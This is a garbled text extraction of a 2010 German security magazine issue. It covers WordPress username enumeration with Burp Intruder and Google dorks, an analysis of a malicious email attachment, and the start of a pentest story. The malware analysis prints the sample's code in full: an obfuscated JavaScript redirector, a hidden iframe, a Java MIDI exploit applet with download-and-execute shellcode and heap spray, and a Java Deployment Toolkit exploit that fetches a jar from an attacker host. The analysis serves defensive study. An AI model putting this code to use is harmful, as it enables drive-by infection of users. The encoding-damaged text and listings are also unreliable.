Wenn Sie sich heute im Internet herumtreiben finden Sie sich zwischen Social Networks Auktionsplattfor-men und Tauschboumlrsen wieder Identitaumlten werden im Netz frei und fuumlr jedermann zugaumlnglich eingestellt und manch einem kommt es vor wie wenn er durch Twit-ter und Co mehr uumlber seinen Nachbarn wuumlsste wie uumlber seinen langjaumlhrigen Freund Obwohl viele immer noch der Ansicht sind sich frei und anonym im Internet bewegen zu koumlnnen so stellen sie doch Details uumlber ihr Leben jedem frei zur Verfuumlgung Sie denken ein frei erfundener Benutzername halte die meisten davon ab ihre wahre Identitaumlt herauszufinden Lassen Sie sich gesagt sein das dies ein Irrtum ist ndash ein sehr groszliger Irr-tum Die Gefahr die all dies mit sich bringt ist leicht zur erklaumlren Stellen Sie sich vor sie arbeiten in einem gro-szligen Telekommunikationsunternehmen Uumlber Facebook und Xing halten Sie gerne Kontakt mit Kollegen aus
dem Ausland ndash dafuumlr sind diese Plattformen ja schlieszlig-lich auch bestens geeignet Doch was wenn jemand ihr Konto uumlbernimmt und unter Ihrem Namen dort Humbug treibt Stellen Sie dies nicht sofort fest so kann diese Internetplattform schnell zu einem sehr groszligen Problem werden Schon bei der Anmeldung bei diesen Seiten le-gen wir unsere wichtigen Daten in die Haumlnde der Betrei-ber ohne das uns eigentlich wirklich interessiert wofuumlr diese weiter verwendet werden Erst wenn mal wirklich ein groszliger Skandal an die Oberflaumlche dringt herrscht Empoumlrung und die allgemeine bdquoich hablsquos doch gesagtldquo-Stimmung kommt auf Bei Spammern und Crackern sind Accounts zu Auktionsplattformen Email-Konten und Social Networks sehr beliebt da viele Benutzer fuumlr mehrere Zugaumlnge das selbe Passwort verwenden und so zum Beispiel durch den eBay-Account auf Rechnung des Opfers eingekauft werden kann Ein Benutzer kann hier nur wenige trotzdem aber effektive Maszlignahmen ergreifen Ein sicheres Passwort zu waumlhlen ist der erste und wichtigste Schritt wobei immer mehr Passwoumlrter uumlber nicht-verschluumlsselte Verbindungen und Keylogger abgefangen werden und somit auch das sicherste Pass-wort nutzlos ist Ein zweiter Schritt waumlre verschiedene Passwoumlrter fuumlr die unterschiedlichen Seiten zu verwen-den und diese regelmaumlszligig zu erneuern Dieser Schritt wird aber leider nur sehr selten wirklich umgesetzt da er mit grossem Aufwand verbunden ist und die meisten Benutzer keine Lust haben sich mehrere verschiedene
User Enumeration bei Web-Applikationen
Wo der normale Benutzer nicht hin soll wo wichtige Daten nur fuumlr einen kleinen Kreis an Personen zugaumlnglich sein sollen wo administrative Aufgaben erledigt werden - uumlberall dort werden Authentifizierungen eingesetz
IN DIESEM ARTIKEL ERFAHREN SIE
-ren
-den
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Kai Renz
User Enumeration bei Web-Applikationen
hakin9orgde 7
anders vorgehen er uumlberpruumlft den Login-Mechanismus auf Ausgaben welche den Benutzernamen verraten oder Hinweise darauf geben koumlnnten ob der zum Test angegebene Name ein wahrer Benutzername ist Hin-weise darauf geben Ruumlckgaben wie bdquoDas fuumlr diesen Be-nutzernamen angegebene Passwort ist nicht korrektldquo oder aumlhnliches Gegengepruumlft werden kann dies durch die Eingabe eines fiktiven Benutzers Variiert die Aus-gabe von der obigen so ist es sehr wahrscheinlich dass der zuvor verwendete Name korrekt war
Ein weiterer Angriffsvektor ist die bdquoPasswort-verges-sen-Funktionldquo Ist solch eine Funktion schlecht ge-schrieben oder ist diese einfach nur zu leichtsinnig dem Benutzer Komfortfunktionen anzubieten koumlnnen fuumlr den Angreifer wichtige Informationen preisgeben werden Eine Fehlkonfiguration bzw leichtsinnige Web 20 Funktion wie die eben angesprochene kann zum Beispiel bei Eingabe der Mailadresse auf der Passwort-Vergessen-Seite mit einem Satz wie bdquoEine Email mit Ihrem neuen Passwort fuumlr den Benutzeraccount ltna-megt wurde erfolgreich an Sie zugestelltldquo antworten wodurch der wahre Benutzer zwar eine Email der An-greifer jedoch auch den Benutzernamen erhaumllt Ist die angegebene Sicherheitsadresse inaktiv oder wird nur sporadisch verwendet so geht diese Email leicht un-ter und der Angreifer kann mit seiner Arbeit fortfahren Ein gutes Beispiel hierfuumlr ist Wordpress Auch in seiner neuesten Version kann uumlber die bdquoPasswort-vergessen-Funktionldquo der Benutzername herausgefunden werden Ein sogenannter Bot-Schutz ist nicht vorhanden so-dass wir das ganze mit einem Webproxy in unserem Fall Burpsuite automatisieren koumlnnen
Durch eine lokale Recherche an einem Wordpress haben wir herausgefunden dass beim Eingeben eines falschen Benutzernamens ein Fehler zuruumlckgegeben wird ERROR Invalid username or e-mail Verwenden wir jedoch den richtigen Benutzernamen erhalten wir ein Check your e-mail for the confirmation link
Passwoumlrter zu merken Oftmals werden zwar viele ver-schiedene Zugangsdaten verwendet durch das haumlufige wechseln werden dann aber eher einfache Passwoumlrter verwendet damit der Benutzer sich diese leicht merken kann
Um einen Zugang zum Benutzerkonto des Anwen-ders zu bekommen sind meist ein Benutzername und ein Passwort noumltig Oftmals fangen hier schon die Pro-bleme an Hat der Angreifer herausgefunden dass sich die Benutzer durch eine Email-Passwort-Kombination anmelden koumlnnen muss er schon mal viel weniger Zeit investieren den Benutzernamen herauszufinden was bei einem Bruteforce-Angriff ein Zeitvorteil sein wel-cher zwischen durchfuumlhrbar und nicht durchfuumlhrbar al-so Erfolg und Misserfolg entscheidet Oftmals reicht al-so schon eine simple Registrierung bei einer Zielseite um die Feinheiten einer Anmeldefunktion herauszufin-den und auszunutzen Kann ein Benutzer seinen Nick-namen frei waumlhlen so sind die Moumlglichkeiten bei einem Bruteforce-Angriff wieder immens sodass der Angrei-fer eine andere Taktik waumlhlen muss Er wird versuchen ohne muumlhsames Durchprobieren von Kombinationen an den Benutzernamen zu kommen oder einen ande-ren Schwachpunkt im System ausnutzen In diesem Artikel werde ich ein paar einfache Moumlglichkeiten dar-stellen um einer Web-Applikation Benutzernamen zu entlocken (User Enumeration) und diese automatisch aufzunehmen
Wie bereits oben beschrieben kann sich der Angrei-fer sofern er dazu berechtigt ist zuerst ein Bild vom Re-gistrierungs- bzw Login-Mechanismus machen Findet er beispielsweiszlige heraus dass der Benutzername eine Mailadresse ist so kann er leicht Suchmaschinen oder Social Networks verwenden um diese herauszufinden Werden frei waumlhlbare Benutzernamen verwendet so faumlllt diese Art von Recherche weitestgehend aus wo-bei natuumlrlich auch hier manchmal ein Gluumlckstreffer da-bei sein kann In so einem Fall wird der Angreifer aber
Abbildung 1 Funktionsweiszlige einfache User Enumeration
Benutzername 1a2a3d4fPasswort sosecret
Benutzername foobarPasswort sosecret
Bruteforce
Benutzername foobarPasswort topsecret
Request Response
Benutzer oder Passwort falsch
Falsches Passwort
Login erforgreich
920108
FUumlR EINSTEIGER
Nun muumlssen wir uns genauer ansehen was zwischen unserem Client und dem Webserver kommuniziert wird Hierfuumlr starten wir Burpsuite und konfigurieren unseren Browser so dass er als Proxy localhost auf Port 8080 verwendet Als naumlchstes wechseln wir in den Proxy-Tab und setzen Intercept auf Off Durch das Deaktivieren dieser Funktion verhindern wir das uns Burpuite bei jedem Schritt fraumlgt ob wir die Daten wirklich zu unse-rem Webserver senden wollen Als naumlchstes besuchen wird unsere Zielseite Wordpress verwendet immer das gleiche Schema httpwwwzielseitedewp-login
phpaction=lostpassword Wir geben absichtlich ei-nen falschen Benutzernamen an und verfolgen wie die
POST-Anfrage und deren Antwort von Burpsuite aufge-zeichnet werden Dort koumlnnen wir unter request -gt pa-
rams unsere gerade eingegebenen und noch weitere Daten betrachten (Abbildung 2)
Als naumlchstes senden wir den Request per Rechts-klick an den Intruder Das Target-Tab lassen wir unbe-ruumlhrt wir werden erst bei den Positions-Optionen aktiv Wir klicken rechts auf bdquoclear $ldquo Als Attacke verwenden wir Sniper Ganz unten im Textfeld sehen wir eine Zeile mit bdquouser_loginldquo Dies sind die Parameter die per POST uumlbergeben werden Ich markiere den zum Test einge-gebenen Benutzername und klicke auf bdquoadd $ldquo (Abbil-dung 3)
Abbildung 3 Der Parameter der veraumlndert werden soll wird markiert
Abbildung 2 Unser POST-Request an Wordpress
User Enumeration bei Web-Applikationen
hakin9orgde 9
Nun muumlssen wir noch unser Payload konfigurieren Hier verwenden wir bdquoPayload Set 1 present listldquo Man kann nun optional eine ganze Liste mit Benutzernamen laden oder einfach per Hand einige eintragen Nun muumlssen wir noch unterscheiden lassen wann ein Benutzer gefunden wur-de und wann nicht Dazu gehen wir in den Option-Tab und scrollen zu grep Wir aktivieren die Checkboxen bei bdquosearch
responses for these expressionsldquo und bdquosimple pattern
matchldquo Auszligerdem druumlcken wir auf clear Die voreingestell-ten Pattern brauchen wir nicht zu verwenden Wir wissen dass bei Eingabe eines existierenden Benutzernamens ein bdquoCheck your e-mail for the confirmation linkldquo zuruumlckgeliefert wird Also tragen wir genau diesen Satz ein und klicken auf add Nun geben wir noch an dass wird redirects folgen wol-len Damit haben wir alles noumltige konfiguriert Wir klicken in der Menuleiste auf intruder -gt start attack Nach einer kurzen Zeit erhalten wir erste Ergebnisse - der Intruder hat zwei Benutzer identifiziert (Abbildung 3) Eine gute Woumlrter-liste erhoumlht die Effizient natuumlrlich deutlich
Somit konnten wir leicht uumlber die Passwort-Verges-sen Funktion automatisiert Benutzer erfassen Natuumlrlich
funktioniert dies auch mit Registrierungssystemen die angeben ob ein Benutzername schon vergeben ist Den Moumlglichkeiten sind hier nur durch die eigene Kreativi-taumlt Grenzen gesetzt Mit dieser simplen Methode gelingt es einem Angreifer automatisiert Benutzernamen zu fin-den ndash doch was kann noch passieren
Eine oft uumlbersehene Tatsache ist dass das Problem oft vor der Tastatur sitzt Sprich der Admin hat etwas falsch konfiguriert So kann es vorkommen dass gan-ze Mitgliederlisten in Foren oumlffentlich zugaumlnglich sind oder im Cache von Suchmaschinen gefunden werden koumlnnen Durch Suchmaschinen wie Google lassen sich solche falsch konfigurierten Seiten leicht auffinden Ei-ne kleine Liste an Google Dorks ist in Listing 1 angege-ben Eine weitere Moumlglichkeit Benutzernamen zu identi-fizieren sind URLs Twitter ist hier ein schoumlnes Beispiel Jeder Benutzer kann sich unter twittercombenutzerna-me austoben Dies stellt eine weitere Moumlglichkeit dar automatisch Namen zu entlarven Wie bereits erwaumlhnt gibt es unzaumlhlige Moumlglichkeiten User Enumeration zu betreiben wodurch Bruteforce eine nicht zu unterschaumlt-zende Moumlglichkeit bleibt
Abbildung 4 Burpsuite Intruder hat zwei Benutzer identifizieren koumlnnen
Listing 1 Google Dorks
inurlmemberlistphp Powered by phpBB
php memberlist
txt memberlist
txt usernames
sql users
KAI RENZDer Autor befindet sich gerade in Ausbildung zum Fachinfor-matiker fuumlr Systemintegration In seiner Freizeit beschaumlftigt er sich mit Themen rund um IT-Sicherheit und Penetration Tes-tingKontakt mit dem Autor kairenzproof-of-conceptorg
2010wwwsigs-datacomde
Kontakt Anja Keszlig middot Lindlaustraszlige 2c D-53842 TroisdorfTel +49 (0) 22 41 23 41-201 middot Fax +49 (0) 22 41 23 41-199 middot Email anjakesssigs-datacomde
wwwsigs-datacomdewwwsigs-datacomde
Die ultimative Hacking-AkademieErfolgreiche Abwehr von Hacker-Angriffen und
sicherer Schutz Ihres NetzwerksKlaus Dieter Wolfinger20 ndash 22 September 201003 ndash 05 November 2010 FrankfM 2150- euro zzgl MwSt
Best Practices fuumlr sichere Web-AnwendungenSicherheitsluumlcken in Webanwendungen vermeiden
erkennen und schlieszligen ndash gemaumlszlig Empfehlung des BSIThomas Schreiber25 ndash 26 Oktober 2010 Duumlsseldorf08 ndash 09 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Sicherheit mit WebService-InfrastrukturenJoumlrg Bartholdt25 ndash 26 Oktober 201022 ndash 23 November 2010 Muumlnchen 1590- euro zzgl MwSt
Cloud Computing im praktischen EinsatzArnd Kleinbeck amp Stefan Tilkov24 Oktober 2010 Muumlnchen10 Dezember 2010 Koumlln 990- euro zzgl MwSt
iPhone Grundlagen und EntwicklungHendrik Schreiber11 ndash 12 Oktober 2010 Koumlln11 ndash 12 Dezember 2010 Koumlln 1590- euro zzgl MwSt
NEU ndash jetzt 3-taumlgig CSM Certified ScrumMaster Course
Voraussetzung fuumlr die Zertifizierung zum Scrum MasterSabine Canditt25 ndash 27 Oktober 2010 Muumlnchen07 ndash 09 Dezember 2010 Muumlnchen 2150- euro zzgl MwSt
Secure Coding mit Java EEEntwicklung einbruchssicherer Webanwendungen
und Webservices unter Java EEMirko Richter26 ndash 27 Oktober 201006 ndash 07 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Web Application Firewall StarterEssentielles Web Application Firewall Grundwissen
Achim Hoffmann17 November 2010 Muumlnchen 990- euro zzgl MwSt
Advanced Web Application Security TestingProfessionelle Sicherheitsuntersuchungen von
Enterprise-Webanwendungen durchfuumlhrenThomas Schreiber01 ndash 02 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Erfolgreich durch Wissensvermittlung aus 1 Hand
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 11
Im untersuchten Beispiel handelt es sich um ei-ne E-Mail die massenhaft versandt wird und eine HTML-Datei als Anhang enthaumllt Die E-Mail hat eine
unverfaumlngliche Betreffzeile wie bdquoRe Vacationldquo oder bdquoRan-dolph Plansldquo und einen ebenfalls unverdaumlchtigen Text wie beispielsweise
bdquoThank you very much for meeting with me on Satur-
day Attached are the plans for the Randolph Street De-
velopment project we discussed If you have any ques-
tions please dont hesitate to contact me
Thanks againldquoIm HTML-Anhang befindet sich ein eingebetteter
JavaScript-Code Um die Erkennung des JavaScript- Codes zu erschweren wurde er verschleiertunleserlich gemacht in der Fachsprache auch als Obfuscation be-zeichnet (vgl Listing 1)
Wird die Datei 39035xlshtml im Anhang im Brow-ser aufgerufen dann wird der Nutzer mittels des Ja-vaScripts an eine bestimmte Internetseite weitergeleitet die Schadcode enthaumllt Schreibt man das JavaScript-Codefragment leserlicher dann sieht man dass eine Weiterleitung zur Seite httpnumerouno-indiacomx
html fuumlhrt1 (vgl Listing 2)Auf der weitergeleiteten WebSite sieht man eine
weitere Weiterleitung an die URL httpscaner-gczccscanner10afid=24 Interessant ist hier nicht die Weiterleitung an eine weitere Seite sondern die Tatsache dass ein unsichtbares iFrame mit Brei-te 0 Pixel und Houmlhe 0 Pixel geladen wird Schauen wir uns die dahinterliegende Seite httparestyute
comsadhbdsa879321jbdasindexphp etwas ge-nauer an (vgl Listing 3)
Malware-Doppelschlag per JavaScript und JavaApplet Automatischer Download durch JavaScript und Ausbruch aus der Virtuellen Java Umgebung
Besonders in diesem Jahr steigt die Anzahl der E-Mails die ohne Zutun des Anwenders oder nur mit sehr wenig Einflussnahme des Anwenders Schadsoftware installieren Das eleven Research-Team hat ein Beispiel naumlher untersucht
IN DIESEM ARTIKEL ERFAHREN SIE
wird
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN-
Script und HTML
Michael Peick
Listing 1 Die Datei 39035xlshtml
ltscript language=JavaScript type=textjavascriptgtfunction etgr(zj4r)varnbo97bvgy=kpn8iyv2=0ocdfu
mipqrlx=nt-v hegtsaltp3jej446=iyv2lengtheval(unescape(66un63ti6Fn r61iy28ku
79c)62vg79+=6Buyc7D))for(p3je=0p3jeltzj4rlengthp3je++)bo97=zj4rcharAt(p3je)k
pn8=iyv2indexOf(bo97)if(kpn8gt-1)kpn8-=(p3je+1)j446if(kpn8lt0)kpn8+=j446raiy(iyv2
charAt(kpn8))elseraiy(bo97)eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv67y
=2222))etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)ltscriptgtltnoscriptgtTo display this page you need a browser that supports
JavaScriptltnoscriptgt
10201012
FORTGESCHRITTENE
Version ein bestimmter Codeblock angesprungen wel-cher eine Schwachstelle in der JVM ausnutzt wodurch ein Jailbreak ermoumlglicht wird Urspruumlnglich sollen Java-Anwendungen in einer Art sicheren Sandbox laufen und keinen Schaden im Computer anrichten2 Diese Barrie-re ist in unserem Beispiel durchbrochen In dem Code-fragment unten (vgl Listing 4a 4b) betrifft die aus-genutzte Schwachstelle vor allem die Java-Versionen bis einschlieszliglich 160_16 Unter httpvreugdenhil-
researchnl201005java-midi-parse-vulnerabilitieskann jeder Interessierte detaillierte Informationen zur verwendeten Schwachstelle erhalten Ausgangspunkt ist ein Fehler in der Verarbeitung von URLs im einge-bauten Midiplayer von Java
Beim Ausnutzen der Schwachstelle wird der Shell-code ausgefuumlhrt welcher nun vollen Zugriff auf das System hat und Schadsoftware mitsamt Trojaner von der externen Quelle (URL) nachladen kann
Sollte der Benutzer eine aumlltere Java-Version installiert haben so wird eine andere Codepassage angesprun-gen die Schwachstellen aumllterer Java-Versionen aus-nutzt
Hier ist ein Java-Applet eingebettet welches beim Aufruf der Seite von der Java-Virtual-Machine ausge-fuumlhrt wird sofern diese im Browser installiert und akti-viert ist Ein weiterer verschleierter JavaScript-Code fin-det sich ebenfalls
Zunaumlchst analysieren wir das Java-Applet tmpdesjar In der Datei befinden sich drei Java-Klassen von denen eine namens devsAdgredY als Einsprungs-punkt fuumlr das Applet dient Mit einem Java-Decompiler kann man die Klassen welche momentan in Java-Byte-code vorliegen in leserlichen Java-Quelltext uumlberfuumlh-ren Dies entspricht nicht ganz dem originalem Quell-text kommt ihm aber recht nahe Wir benutzen dafuumlr den Decompiler von httpjavadecompilerfreefrSchaut man sich nun den Java-Quelltext an stellt man fest dass keine Obfuscation fuumlr Java wie zB das un-ter der GPL 2+ stehende ProGuard benutzt wurden Was zu erwarten gewesen waumlre um die Erkennung zu erschweren
Nach einer Verifikation der als Parameter uumlbergebe-nen URL httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1 wird abhaumlngig von der Java-
Listing 2 Weiterleitung an eine weitere Seite
function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) +
kpn8 -= (p3je + 1) j446
if (kpn8 lt 0)
kpn8 += j446
raiy(iyv2charAt(kpn8))
else
raiy(bo97)
documentwrite(bvgy)bvgy=
eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv
67y=2222))
documentwrite(ltmeta http-equiv=refresh
content=0url=httpnumerouno-
indiacomxhtml gt)
etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x
emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)
if (this_is == an_example)
do_something()
else
var a = b (c d) e[f]
PLEASE WAITING 4 SECONDS
ltmeta http-equiv=refresh content=4url=http
gt
ltiframe width=0 height=0 src=httparestyute
comsadhbdsa879321jbdasindex
phpgtltiframegt
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 13
Listing 3 Seite bdquohttparestyutecomsadhbdsa879321jbdasindexphprdquo (gekuumlrztes HTML Dokument)
ltbody id=greldm2gt
ltapplet archive=tmpdesjar code=devsAdgredY
width=462 height=255gt
ltparam name=data VALUE=httparestyute
comsadhbdsa879321jbdasl
phpdeserialize=6eampi=1gt
ltparam name=cc value=1gt
ltappletgt
ltbodygt
ltscriptgtvar cmjve3=dltiltih=A2F40Jy=soayQaUab0
=gioltgt~d55003c844047000000
000001000001100200000000000000000D
0035D4266064660005400D10030001A000-
0000410060A)(VcroltB=iillA0A50Cet
beseErsltEe 00000000000D01A
DD0001D100031400400D10084000000003
0060LHehJ)function jvfpb(blktgw)
return blktgwreplace(ig
)replace(~ig)replace(raquo
igStringfromCharCode(0x20x5))
replace(lt95gtigString
fromCharCode(0x2E0x2))
documentwrite(ltpgt1663ltpgt)var
ivypgs3=parseInt(document
getElementById(greldm2)
getElementsByTagName(String
fromCharCode(0x70))[parseInt(String
fromCharCode(0x30))]innerHTML)var
kwjse=for (cqdqdsc = ivypgs3
cqdqdsc gt 0 cqdqdsc--)for (gtkvdm
= ivypgs3-cqdqdsc gtkvdm lt= cmjve3
length gtkvdm=gtkvdm+ivypgs3)
kwjse=kwjse+cmjve3
charAt(gtkvdm)var
fnhld=kwjse+var isguhrd=jvfpb(fn
hld)eval(isguhrd)ltscriptgt
Listing 4a Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
public void init()
shellcode
String str2 = 505351525657559CE8000000005D83ED0D31C06
4034030780C8B400C8B701CAD8B4008EB0
98B40348D407C8B403C5657BE5E0100000
1EEBF4E01000001EFE8D60100005F5E89E
A81C25E010000526880000000FF954E010
00089EA81C25E01000031F601C28A9C356
302000080FB007406881C3246EBEEC6043
20089EA81C24502000052FF95520100008
9EA81C2500200005250FF9
5560100006A006A0089EA81C25E0100005289EA81C278020000526
A00FFD06A0589EA81C25E01000052FF955
A01000089EA81C25E01000052688000000
0FF954E01000089EA81C25E01000031F60
1C28A9C356E02000080FB007406881C324
6EBEEC604320089EA81C24502000052FF9
55201000089EA81C2500200005250FF955
60100006A006A0089EA81C25E010000528
9EA81C2A6020000526A00FFD06
A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C3000
0000000000000000000000000000047657
454656D705061746841004C6F61644C696
272617279410047657450726F634164647
26573730057696E4578656300BB89F289F
730C0AE75FD29F789F931C0BE3C0000000
3B51B02000066AD03851B0200008B70788
3C61C03B51B0200008DBD1F020000AD038
51B020000ABAD03851B0200005
0ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF
3A65974045E43EBE95E93D1E0038527020
00031F69666ADC1E00203851F02000089C
6AD03851B020000C3EB100000000000000
000000000000000000089851B020000565
7E858FFFFFF5F5EAB01CE803EBB7402EBE
DC355524C4D4F4E2E444C4C0055524C446
F776E6C6F6164546F46696C65410070646
67570642E65786500637261736
82E70687000
nops for the nop-slice
String str10 = 90909090
String java_version = SystemgetProperty(java
version)
url
String url = getParameter(data) applet method
int i = 0
int j = 0
while (urlcharAt(i) = )
j += urlcharAt(i)
i += 1
j += 7
j = 256
String checksum = IntegertoHexString(j)
checksum = 6e correct for the url
httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1
if (urlindexOf(deserialize= + checksum) == -1)
return
10201014
FORTGESCHRITTENE
Zusaumltzlich wird noch das oben erwaumlhnte verschleierte JavaScript auf der urspruumlnglichen HTML-Seite geladen Dieses ist noch erstaunlicher denn es enthaumllt gleich ei-ne ganze Ladung von Exploits fuumlr Java Adobe Flash sowie Adobes PDF Reader bereit Der sbquoAuthorlsquo der Sei-te war auf houmlchste Kompatibilitaumlt aus denn auch hier werden nur bestimmte ndash vor allem neuere ndash Versionen der Browser Plugins unterstuumltzt (vgl Listing 5)
Unter httpwwwexploit-dbcomexploits12117 fin-det man eine Beschreibung der Schwachstelle Diese betrifft zusaumltzlich zum analysierten Applet die Java-Ver-sion 160_19
Zusammenfassend laumlsst sich feststellen dass Schadsoftware auf verschiedensten Wegen ins Sys-tem gelangen kann Es ist nicht mehr notwendig Programme zu installieren oder aumlhnliches Die hier beschriebene HTML-Datei koumlnnte auch in einem HTML-faumlhigen E-Mail-Client ausgefuumlhrt werden Ebenso kann die iFrame-Konstruktion in E-Mails platziert werden Es sind nicht nur einzelne Pro-gramme oder PlugIns fuumlr Browser betroffen son-dern es wird versucht gezielt neue Schwachstellen fuumlr mehrere populaumlre Programme zu finden was der letzte Ausschnitt des JavaScript-Codes zeigt Auch
Listing 4b Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
Object localObject1
Object localObject2
Object localObject4
Object localObject5
String str20
String str21
String str22
if ((((java_versionindexOf(160_11) = -1) ||
(java_versionindexOf(160_12) = -1) ||
(java_versionindexOf(160_13) = -1) ||
(java_versionindexOf(160_14) = -1) ||
(java_versionindexOf(160_15) = -1) ||
(java_versionindexOf(160_16) = -1) 1 0) amp
(urlindexOf(i=1) == -1 1 0)) = 0)
Java midi vulnerable see http
vreugdenhilresearchnl201005
java-midi-parse-vulnerabilities
for detailed explaination The author claims that it
was in java 160_19
localObject1 =
localObject1 = repeat( 303)
using windows no return
localObject2 = SystemgetProperty(osname)
toLowerCase()
if (((String)localObject2)indexOf(win) gt= 0)
localObject1 = repeat( 302)
else
return
the core of the vulnerable create a malicious url
and ask javas midiplayer to play
localObject1 = + (String)localObject1 +
ZZZZZZ
try
String str19 = url + 11
localObject4 =
for (int k = 0 k lt str19length() k++)
localObject4 = (String)localObject4 + Integer
toHexString(str19charAt(k))
while (((String)localObject4)length() 8 = 0)
localObject4 = (String)localObject4 + 26 0x26 =
amp
localObject4 = str2 + (String)localObject4
thismem = spray((String)localObject4 str10)
localObject5 = new URL((String)localObject1)
MidiSystemgetSequencer()
str21 =
MidiSystemgetSoundbank((URL)localObject5) lt-- put
in url here
str22 =
MidiSystemgetSequencer()
while (true)
Threadsleep(10L)
catch (Exception localException2)
Systemoutprintln(localException2)
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 15
das Verbieten von JavaScript3 was moderne Ajax-basierte Internetseiten nahezu unbenutzbar macht haumltte auf das Laden des JavaApplets keine Auswir-kung
Wie kann man derartigen heterogenen Bedrohun-gen begegnen Das haumlufigste Einfallstor fuumlr Schad-software bleibt die E-Mail Also ist die Absicherung der E-Mail-Kommunikation der erste und wichtigs-te Schritt zur Sicherung des Systems Moderne An-ti-Spam und Anti-Virenprogramme sind in der Lage Massenmails mit gefaumlhrlichen Anhaumlngen zu erken-
nen bevor entsprechende Signaturen bereitstehen Weiterhin sollte der ausgehende E-Mail-Verkehr mit gleicher Sorgfalt auf Spam und Viren gepruumlft wer-den wie der eingehende Nur so kann man feststel-len ob man bereits ungewollt zum Spam- und Viren-versender geworden ist Am besten funktioniert dies mit einer ausgelagerten E-Mail-Sicherheitsloumlsung da der Anbieter meist von der Masse der empfangenen und analysierten E-Mails profitiert sprich Bedrohun-gen meist schneller erkennt als der einzeln agieren-de Mail-Server-Administrator Und letzen Endes gilt immer noch Oumlffnen Sie keine E-Mails oder Anhaumlnge von Unbekannten
httpde-wikipediaorgwikiJava_Virtual_Machine
fox
Listing 5 Codefragment des entschleierten JavaScript verdeutlicht das Potential
var fdata
var skd=u5350u5251u5756u9c55u00e8u0000u5d00
ued83 u6870u0070
var skd1=skd + u7468u7074 u0038u9000
var skd2=skd + u7468u7074 u0032u9000
function JAVASMB()
try
see httpwwwexploit-dbcomexploits12117 for
exploit description
var u = HTTP -J-jar -Jbittoramcomsmbold
avi httparestyutecom
sadhbdsa879321jbdaslphpi=2
none
if (windownavigatorappName == Microsoft Internet
Explorer)
try
var o = documentcreateElement(OBJECT)
oclassid = clsidCAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
olaunch(u)
catch (e)
var o2 = documentcreateElement(OBJECT)
o2classid = clsid8AD9C840-044E-11D1-B3E9-
00805F499D93
o2launch(u)
else
var o = documentcreateElement(OBJECT)
var n = documentcreateElement(OBJECT)
otype = applicationnpruntime-scriptable-
plugindeploymenttoolkit
ntype = applicationjava-deployment-toolkit
documentbodyappendChild(o)
documentbodyappendChild(n)
try
olaunch(u)
catch (e)
nlaunch(u)
catch (e)
IEPEERS()
IEPEERS()
JAVASMB()
MICHAEL PEICKEntwickler und Mitglied des eleven Research Teams
Penetration Testing im Jahre 2010
hakin9orgde 17
Im Jahr 2010 ist es kein Problem mehr ein Netzwerk vor Gefahren zu schuumltzen Firewall-Hardware gibt es mittlerweile zu erschwinglichen Preisen IT-System-
haumluser holen sich Sicherheitsexperten und richten mit deren Unterstuumltzung ein sicheres Netzwerk ein Mitar-beiter werden im Umgang mit der IT-Technik geschult sodass Phishing und Social Engineering Angriffe erfolg-los verlaufen IDS und IPS Systeme finden verdaumlchtige Aktivitaumlten im Netzwerk und zeigen diese dem Adminis-trator an Die IEEE 8021X Authentifizierung an Access Points und Netzwerkswitches verhindern den Zugang von unbekannten Computern zum Netzwerk Mit IEEE 8021Q (Virtual Local Area Network oder kurz VLAN) werden Netzwerke segmentiert obwohl alle Compu-ter hardwareseitig an einem Switch haumlngen Mit diesen Techniken ist man in der Lage ein Netzwerk sowohl vor Angriffen aus dem WAN als auch aus dem Inneren LAN zu schuumltzen ndash wuumlrde man meinen
Die RealitaumltIch wurde von einem mittelstaumlndischen Unternehmen engagiert einen Penetrationstest durchzufuumlhren Waumlh-rend der Footprinting-Phase habe ich sehr schnell er-kannt dass die IT-Sicherheit bei diesem Unternehmen ein sehr sensibles Thema ist Doch trotz fast paranoider Sicherheitsvorkehrungen ist es mir erfolgreich gelun-gen dem Unternehmen die Kundendaten zu entwen-den Zwar war IT-Technisch alles abgesichert der phy-sische Zugang zu den Daten war es allerdings nicht Die Eingangstuumlr des Unternehmens war wegen des
